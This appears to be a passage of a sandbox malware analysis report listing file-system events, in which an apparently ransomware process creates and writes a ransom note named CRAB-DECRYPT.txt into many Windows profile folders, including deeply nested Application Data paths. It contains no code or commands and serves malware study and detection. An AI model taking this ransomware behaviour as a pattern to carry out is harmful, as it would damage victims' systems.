| File | Create | filename = C:\Documents and Settings\Default\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\SendTo\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Start Menu\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Start Menu\Programs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Start Menu\Programs\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Start Menu\Programs\Accessories\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Start Menu\Programs\Accessories\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Start Menu\Programs\System Tools\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Start Menu\Programs\System Tools\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Templates\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
